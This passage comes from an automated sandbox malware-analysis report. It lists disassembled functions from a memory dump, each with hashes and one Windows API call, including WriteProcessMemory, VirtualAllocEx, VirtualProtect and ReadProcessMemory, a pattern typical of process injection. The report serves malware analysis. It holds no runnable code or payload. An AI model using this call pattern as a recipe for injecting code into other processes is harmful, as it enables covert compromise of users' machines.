                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: f948a4f9bd7eab0b0be446ca242f6e50f93b9077d55d4c7e05c460d2c9b9df3a
                                                                • Instruction ID: 10a5411efdf516e1d54c1c1f3a2b5a596e63d978402e41d807d0ba7acaee4491
                                                                • Opcode Fuzzy Hash: f948a4f9bd7eab0b0be446ca242f6e50f93b9077d55d4c7e05c460d2c9b9df3a
                                                                • Instruction Fuzzy Hash: 634173B1D00208EBEF00AF91D846BEEBB71EF14315F50802AF9047A291D7795E55CB65
                                                                APIs
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0043C747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1801431ed1471038946ceae503e42c9e7db3f17625129ac0aeb01a98fbf4d861
                                                                • Instruction ID: 7c82150a22ecb1966c2a1799c033551f36b6e23ce824140ea61281186bba03ac
                                                                • Opcode Fuzzy Hash: 1801431ed1471038946ceae503e42c9e7db3f17625129ac0aeb01a98fbf4d861
                                                                • Instruction Fuzzy Hash: 483178B1E0030ABBEB00EFA19CC5FBF7778EB08304F10447EAA04B6282E7795A144B55
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 010b8899327d02603b7fc267cac4e5b97729de5c497a1888bac3f14be82272f7
                                                                • Instruction ID: 5c79acf4356ce2ac4ec0f0b527197483198b7a1c515f74638b0e85d2f484a2df
                                                                • Opcode Fuzzy Hash: 010b8899327d02603b7fc267cac4e5b97729de5c497a1888bac3f14be82272f7
                                                                • Instruction Fuzzy Hash: B041CE70C0461CEBEF00AF91E84ABEDBF30FB48714F52509AE18035195CB7A4AB5DB59
                                                                APIs
                                                                • SendMessageA.USER32(?,?,?,?), ref: 004A8E48
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 7cf1bb33b07c6135e5230db07470b743291789b9f5a67753a750df357404ecd2
                                                                • Instruction ID: 2f8709da3d407c77e0b0e79f1f2b659f59b39391966fb060892a15c98058282c
                                                                • Opcode Fuzzy Hash: 7cf1bb33b07c6135e5230db07470b743291789b9f5a67753a750df357404ecd2
                                                                • Instruction Fuzzy Hash: 70210B75E00208FFDB40DFA8D985B9EBBB5FB1D300F140069E608E7251D7359A60DB56
                                                                APIs
                                                                • GetWindowTextA.USER32(00000000,00000000,000000FF), ref: 0045407E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TextWindow
                                                                • String ID:
                                                                • API String ID: 530164218-0
                                                                • Opcode ID: c7c971cc49ee7c320bc15f877aaac2b9d96152cbd3bd7ff3bbdbfddd0c860f8b
                                                                • Instruction ID: 8c034cc1d3d227e54b838da7e6a3f6fe8d28a7561d9c98345994667f28a27d2b
                                                                • Opcode Fuzzy Hash: c7c971cc49ee7c320bc15f877aaac2b9d96152cbd3bd7ff3bbdbfddd0c860f8b
                                                                • Instruction Fuzzy Hash: F911CA71F00305BBEB60EFA59C86B6E76B89B04714F20006EBA04BB2C2E9759E549759
                                                                APIs
                                                                • GetClassNameA.USER32(00000000,00000000,000000FF), ref: 00454134
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassName
                                                                • String ID:
                                                                • API String ID: 1191326365-0
                                                                • Opcode ID: c7de5c44d5e07430e4216ec36754341827ff67021eabdf98d771b6d6315ec4f5
                                                                • Instruction ID: 3ff09627a9323dcdf74e35c1d60f9bda83b8ce4d289816c831cf0758ba0b40e1
                                                                • Opcode Fuzzy Hash: c7de5c44d5e07430e4216ec36754341827ff67021eabdf98d771b6d6315ec4f5
                                                                • Instruction Fuzzy Hash: 91110A71F00305BBEB60EFA48C8AF6E76BC9B18314F10006EB904BB283DA754E949759
                                                                APIs
                                                                • GetTempPathA.KERNEL32(000000FF,00000000), ref: 00450E25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PathTemp
                                                                • String ID:
                                                                • API String ID: 2920410445-0
                                                                • Opcode ID: af3aa722925591cff200d541868dfb28ba4ac04f5d5cd6148ed3ac13454cd072
                                                                • Instruction ID: e24397560946db6b8198f02c20047b2a48e357cafc7c2d87ea6ef565ac905fba
                                                                • Opcode Fuzzy Hash: af3aa722925591cff200d541868dfb28ba4ac04f5d5cd6148ed3ac13454cd072
                                                                • Instruction Fuzzy Hash: 3B11A774F40304BBE760EE949C83F6E76B89B04704F20446DFA08B6283D5755A548759
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 004B0347
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 50abeafaa1a5c397077bf6a3b6553cdce84a9ef0a8c71331850d4ea531b1c9df
                                                                • Instruction ID: a9eeb14bb7cb9b03773850dba93674fdde55d89127fb21b7c01fd8f2ff19e540
                                                                • Opcode Fuzzy Hash: 50abeafaa1a5c397077bf6a3b6553cdce84a9ef0a8c71331850d4ea531b1c9df
                                                                • Instruction Fuzzy Hash: 67112B74E04209EBEB109E54D949BEF77B4EB04306F10506AED05AB381E3799A50DBA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55cc402581052bb7c4779ee50c8daca9add5a0d1fcd813a09728df581dc69c8f
                                                                • Instruction ID: f4ca3fe5052cdacaafb3009c0895c12a7bd6a0b3cdbd7b59d31924fb5c954347
                                                                • Opcode Fuzzy Hash: 55cc402581052bb7c4779ee50c8daca9add5a0d1fcd813a09728df581dc69c8f
                                                                • Instruction Fuzzy Hash: 8BB181B5D00208AFEF50DFA1D986FEE7BB4EB18314F10402EF105B6291D7B95E509B69
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B4DF1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 760666b61dc545d3abaa7938f7ba8eafbc2b7c23c1254eb9634a771b6cb11529
                                                                • Instruction ID: 6c80bb89c1b8a289e9314c8f2cf3ccc973041d69980c27a0845a96177901a86e
                                                                • Opcode Fuzzy Hash: 760666b61dc545d3abaa7938f7ba8eafbc2b7c23c1254eb9634a771b6cb11529
                                                                • Instruction Fuzzy Hash: 2A116D30C0460CE7DB00AF91F94A7FEBB38FB84310F218496E49035196CB798A34D76A
                                                                APIs
                                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000100), ref: 00440107
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DirectoryWindows
                                                                • String ID:
                                                                • API String ID: 3619848164-0
                                                                • Opcode ID: a82611d599d8f2d42e39b968d883b12096aa04c234ff81e4f98ee2eba4e0e3a7
                                                                • Instruction ID: 491acbb18282efbecbcb31fea4d6bc26d52704b3c4182a0ce19d1dd6fd28d020
                                                                • Opcode Fuzzy Hash: a82611d599d8f2d42e39b968d883b12096aa04c234ff81e4f98ee2eba4e0e3a7
                                                                • Instruction Fuzzy Hash: 9F01CC71E40304BBEB50DF949D83F9DB778DB05300F10006DF60876282D67A5B508755
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8432b38c690260ad73e7fe7cdb81815dfa2d89b958cb99d4fd2b8c935008bd26
                                                                • Instruction ID: 675ef3cd2013f9c44bc97c5cec69d62f0dd0f95f2be87cb63023ca5698766a23
                                                                • Opcode Fuzzy Hash: 8432b38c690260ad73e7fe7cdb81815dfa2d89b958cb99d4fd2b8c935008bd26
                                                                • Instruction Fuzzy Hash: 26B14DB1D00208AFDF00EFA5C8C6BEE7BB4EB08314F50406AF505B6291E77A5E519B79
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00001000,00000040,?,?,?,?,?,004C8ADA,00000000), ref: 004C8DBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 5321aadd03b4ff78bf87896a842166763a14602d555da917c8a2ebc2c63137a6
                                                                • Instruction ID: dd16b350c8c55309d0d2a4603b058fc0e2ad63f3eecb3caa54ef0ce129237d98
                                                                • Opcode Fuzzy Hash: 5321aadd03b4ff78bf87896a842166763a14602d555da917c8a2ebc2c63137a6
                                                                • Instruction Fuzzy Hash: 52016774E40308FBEB50AF91CC46FADBB70EB04705F108059FA047E2D1D67A5A609F89
                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 004A41EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: fb404a7be434b38586d50e3682ebd8736a5d6832af9ddd3396040e0f4298746c
                                                                • Instruction ID: 1fa6d6f9f2caa90c4173e54f779f6949a5d5ea07f330ef5204728c791f2174f2
                                                                • Opcode Fuzzy Hash: fb404a7be434b38586d50e3682ebd8736a5d6832af9ddd3396040e0f4298746c
                                                                • Instruction Fuzzy Hash: 33012C76C0020CEBDF109F90D909B9EBBB4EB51315F00806AF9146A280D3B98B64DF95
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00456116
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 1653199695-0
                                                                • Opcode ID: 68d7b51abcb88482ced3597df9320cb623684ecc113ab7292be451705457c5bb
                                                                • Instruction ID: 8687cb2ca3b80703b1d3f32da0f969eaa0c79a7cf78db1c88bd3005a0fd612b9
                                                                • Opcode Fuzzy Hash: 68d7b51abcb88482ced3597df9320cb623684ecc113ab7292be451705457c5bb
                                                                • Instruction Fuzzy Hash: 4DF01D75D0420CEBDB10DFA4D9057AEFB78AB01355F108166E814AB2C2D7798B18DB89
                                                                APIs
                                                                • ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: ec66ef47455b45cf9ab7b777ed90957b4d84bec4f2e42e8436d899fcd9851da7
                                                                • Instruction ID: 85ebc6002c90a229762f8ee1c2dc5b1c0c305469819d3ef9b180a6c082364497
                                                                • Opcode Fuzzy Hash: ec66ef47455b45cf9ab7b777ed90957b4d84bec4f2e42e8436d899fcd9851da7
                                                                • Instruction Fuzzy Hash: 62F01774D1420CFBEB54EF80D806BADBB74BB11710F109466A5146B280D27A9A98EB8A
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 004A0652
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 9d75f1a898ddacdbaeeb6dc034e50d59440f31f7ff18817266f9988c7b2de5f4
                                                                • Instruction ID: 002e4937401c46ab901ff166ee5e83c665022e3b3ffa476f939f3ae7b65d2c95
                                                                • Opcode Fuzzy Hash: 9d75f1a898ddacdbaeeb6dc034e50d59440f31f7ff18817266f9988c7b2de5f4
                                                                • Instruction Fuzzy Hash: C9F0F87194020CFBDF019F90DC46FAE7B35EB1A314F108165FA042A1A0D7768A35EB9A
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004562C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 1653199695-0
                                                                • Opcode ID: cec13cbd7373f84ba33bab6a39f6c284c3370ecad1f45b2b4b15133a7338f778
                                                                • Instruction ID: a7b4e03387866221ebf57b103b6a0ff9189fdb8ee1850808b069291f5b987186
                                                                • Opcode Fuzzy Hash: cec13cbd7373f84ba33bab6a39f6c284c3370ecad1f45b2b4b15133a7338f778
                                                                • Instruction Fuzzy Hash: 2AF030B0D4020CFBDB00EF94D946BAEFB78AB11301F1080AAE904BB281D3755B54DF99
                                                                APIs
                                                                • IsBadStringPtrA.KERNEL32(0040E69D,00000004), ref: 0040E887
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String
                                                                • String ID:
                                                                • API String ID: 2568140703-0
                                                                • Opcode ID: 883722d1c14e2c6e1ff6a9bfe61ba7b481f64e8f529928896bbdef5fc2fbc29e
                                                                • Instruction ID: 07323debd0214050571aa9a78ad8b29dd022128f6f7da5e25aa24f08b7018e76
                                                                • Opcode Fuzzy Hash: 883722d1c14e2c6e1ff6a9bfe61ba7b481f64e8f529928896bbdef5fc2fbc29e
                                                                • Instruction Fuzzy Hash: 68E04F71E45308BBD710AE52D907BADBB74DB02715F0094B6FA043B1D0D27A4A64AB9E
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000010,00000008,00000010), ref: 004B4CB1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
